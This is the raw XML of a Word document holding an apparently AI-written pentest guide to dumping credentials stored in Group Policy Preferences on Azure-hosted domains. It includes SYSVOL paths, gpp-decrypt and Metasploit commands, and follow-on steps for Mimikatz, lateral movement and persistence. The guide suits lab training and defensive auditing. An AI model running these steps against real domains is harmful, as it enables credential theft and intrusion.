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B2191" w14:textId="43D54055" w:rsidR="00F41B33" w:rsidRDefault="00C311DB">
      <w:r>
        <w:t>Credential dumping with group policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B46801" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB"/>
    <w:p w14:paraId="1D71D580" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc221397418"/>
      <w:r>
        <w:t>with group policy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3318454D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="45275E7C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Sure! Here's a cleaned-up, detailed, and well-structured summary of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential Dumping with Group Policy Preferences (GPP)</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> pentesting on Azure Windows/Linux VMs targeting Local accounts, AD accounts, and Microsoft Entra ID accounts. I've removed duplicates, added context, detailed steps, commands, and highlighted relevant Azure VM vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126087C7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="35151990">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4590C5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Credential Dumping with Group Policy Preferences (GPP) on Azure VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CFA73D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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404FA88D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Preferences (GPP)</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> allow Windows administrators to configure a variety of system and application settings, including creating local user accounts and setting passwords. However, GPP stores certain sensitive information (like passwords) in SYSVOL in an </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>encrypted</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> but easily decryptable form. This vulnerability can be exploited to extract credentials of local or domain accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01F773" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="0582712C">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="257EC288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Why is GPP Dangerous?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF9A763" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>GPP stores passwords in XML files inside the SYSVOL share on Domain Controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26973B7C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>The encryption used by GPP is weak and can be decrypted offline using public tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D1D892" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Attackers with read access to SYSVOL (often accessible by any domain user) can dump these credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E0852" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Exploiting GPP can reveal plaintext or decryptable passwords for local accounts, domain accounts, and service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7341FCDD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="783C5FE0">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="458EAAA3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Lab Setup Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D350EE7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Azure environment with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478965AC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Controller VM</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> (Windows Server with Active Directory Domain Services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0E4256" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">One or more </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain-joined Windows VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713C8B1" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Network configured for internal communication (VNET/subnet allowing SMB access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06F40F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">A client machine or attacker VM with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit, PowerShell, gpp-decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDC169" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="3F370BBC">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4681AA71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Step-by-Step Pentest Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77748DF5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1. Creating a GPP User Account on the Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D76F932" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">This is typically the </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vulnerable configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> to find and exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6842E37B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use Group Policy Management Console (GPMC) on Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691DCA3C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Navigate to:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>User Configuration -&gt; Preferences -&gt; Control Panel Settings -&gt; Local Users and Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E456DC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Create a new local user with a password stored in the GPP XML files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E50172" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">The password is encrypted using a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hardcoded AES key</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>, reversible with public tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C757637" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="3DCA12C6">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144E2F0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2. Locating GPP XML Files (SYSVOL share)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2EB8D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Connect to the Domain Controller’s SYSVOL share to find XML files containing passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D35C50" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>net view \\&lt;domain-controller-ip&gt;\SYSVOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189259B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Look inside:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15747C29" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>\\&lt;domain-controller-ip&gt;\SYSVOL\&lt;domain&gt;\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CBE3FF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F682D5" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>\\&lt;domain-controller-ip&gt;\SYSVOL\&lt;domain&gt;\Policies\{GUID}\User\Preferences\Groups\Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405ED03" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>These XML files contain encrypted passwords for the accounts created or managed by GPP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32625871" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="0C3F09DA">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7C46A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3. Extracting and Decrypting Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3366D66C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Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3CC4C2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gpp-decrypt.py</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> (Python script that decrypts passwords)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554F096" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit auxiliary/gather/gpp</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169E877B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell Empire</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> or custom PowerShell scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC03D1E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="6969B474">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF59406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Example commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C61C7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Using gpp-decrypt.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227FE098" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>gpp-decrypt.py Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7DDC5" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>This will output decrypted passwords in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A638B08" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="173CB231">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D9A226" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Using Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E6964" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>use auxiliary/gather/credentials/gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168DF626" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set RHOSTS &lt;domain-controller-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F28DAF5" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64C9F6" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>This automates enumeration and extraction of passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4BDDA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="0E8CB26F">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71144C14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4. Using Extracted Credentials for Lateral Movement and Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B78D15" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Use credentials to </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDP/WinRM/SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> into Azure Windows/Linux VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AC352C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Dump additional credentials with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780AAF4" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Escalate privileges locally or in AD (if domain accounts are compromised)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2B47E6" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use compromised accounts to pivot or perform persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D724D05" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="46A5FB61">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501AC6F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5. Additional Techniques and Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C40DC37" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GP3finder</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> — Tool for scanning SYSVOL shares for vulnerable GPP files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D052B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell Empire</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> — For running post-exploitation commands remotely using the compromised credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CC1EA2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> — Native scripts to query SYSVOL and decrypt GPP credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C008CA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="68A994C6">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E025A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Azure VM Specific Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654D0FC8" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Misconfigured Domain Joined VMs:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> VMs joined to the domain that have SMB/WinRM/RDP exposed internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58636ABC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak or Default Local Admin Passwords:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Often set via GPP and stored insecurely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79028A88" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overly permissive access to SYSVOL:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Allows any authenticated user or attacker with limited access to retrieve GPP files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7189743F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Poor network segmentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Allows an attacker to move laterally between VMs in the same Azure VNET/subnet</w:t>
      </w:r>
    </w:p>
